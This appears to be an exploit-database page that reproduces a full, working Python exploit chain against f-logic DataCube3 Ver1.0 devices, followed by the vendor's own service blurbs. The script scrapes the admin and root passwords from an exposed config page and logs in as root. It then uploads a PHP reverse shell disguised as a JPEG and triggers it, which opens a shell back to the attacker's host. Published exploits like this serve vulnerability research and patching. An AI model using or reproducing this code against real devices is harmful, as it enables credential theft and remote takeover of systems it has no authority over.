Vulners
Lucene search
DataCube3 1.0 Shell Upload
10
`# Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'
# Date: 7/28/2022
# Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)
# Vendor Homepage: https://www.f-logic.jp
# Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf
# Version: Ver1.0
# Tested on: DataCube3 version 1.0 (Ubuntu)
# CVE : CVE-2024-25830 + CVE-2024-25832
# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload
from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3
import re
urllib3.disable_warnings()
def banner():
dataCube3Logo = """
▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓
▒▒▒▒▒▒▒▒██ DataCube3 Ver1.0 █F-logic▓▓
▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
▒▒▒▒▒▒▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
▒▒▒▒▒▒▒▒██ ██▓▓████▓▓
▒▒▒▒▒▒▒▒██ ██ ██ ██▓▓████▓▓
▒▒▒▒▒▒▒▒██ █████████████████ ██▓▓▓▓▓▓▓▓
▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mDataCube3 exploit chain reverse shell\033[1;m
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))
def extractRootPwd(RHOST, RPORT, protocol):
url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
try:
response = requests.get(url, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
scriptTag = str(soup.find_all('script')[12]).replace(' ', '')
rawLeakedData = re.findall('configData:.*,', scriptTag)[0]
jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))
adminPassword = jsonLeakedData[12]['value']
rootPassword = jsonLeakedData[14]['value']
print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))
return rootPassword
except:
print('[ERROR] Can\'t grab the DataCube3 version...')
def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):
print('[INFO] Generating DataCube3 auth cookie ...')
url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
data = {
'user_id': 'root',
'user_pw': rootPassword,
'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'
}
try:
response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')
exit()
authCookie = response.cookies.get_dict()
print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie))
return authCookie
except:
print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')
def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):
print('[INFO] Extracting Accesstime ...')
url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
try:
response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')
exit()
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
accessTime = soup.find('input', {'name': 'accesstime'}).get('value')
print('[INFO] AccessTime value: {}'.format(accessTime))
return accessTime
except:
print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')
def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):
print('[INFO] Injecting PHP reverse shell script ...')
filename='rvs.php'
payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)
data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��追å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)
headers = {
'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'
}
url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
try:
response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')
exit()
shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)
print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))
return shellURL
except:
print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')
def execReverseShell(shellURL):
print('[INFO] Executing reverse shell...')
try:
response = requests.get(shellURL, allow_redirects=False, verify=False)
print('[INFO] Reverse shell successfully executed.')
return
except Exception as e:
print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')
return False
def main():
banner()
args = parser.parse_args()
protocol = 'https' if args.RPORT == 443 else 'http'
rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)
authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)
accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)
shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)
execReverseShell(shellURL)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)
parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)
parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)
parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)
parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)
main()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.2403